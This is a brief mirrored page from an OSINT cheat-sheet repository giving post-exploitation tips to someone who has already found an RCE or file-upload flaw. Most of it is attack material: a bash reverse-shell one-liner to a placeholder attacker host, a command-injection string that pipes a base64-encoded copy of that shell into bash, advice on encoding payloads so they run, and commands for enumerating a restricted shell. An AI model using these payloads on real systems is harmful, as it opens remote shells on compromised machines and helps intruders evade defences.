mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2025-12-06 21:01:26 -08:00
1.1 KiB
1.1 KiB
TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
- Make sure the target has internet access (internet access opened)
- Try changing the port to a larger one such as 8080, 8888, etc.
- Encode your script using base64 and then decode it
- Encode your script using url encode
Script 1
sh -i >& /dev/tcp/<YOUR HOST OR IP>/<PORT> 0>&1
Script 2
; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;"
Tips escape from jails or hardening server
Enum about the jail
echo $SHELL
echo $PATH
env
export
pwd
Source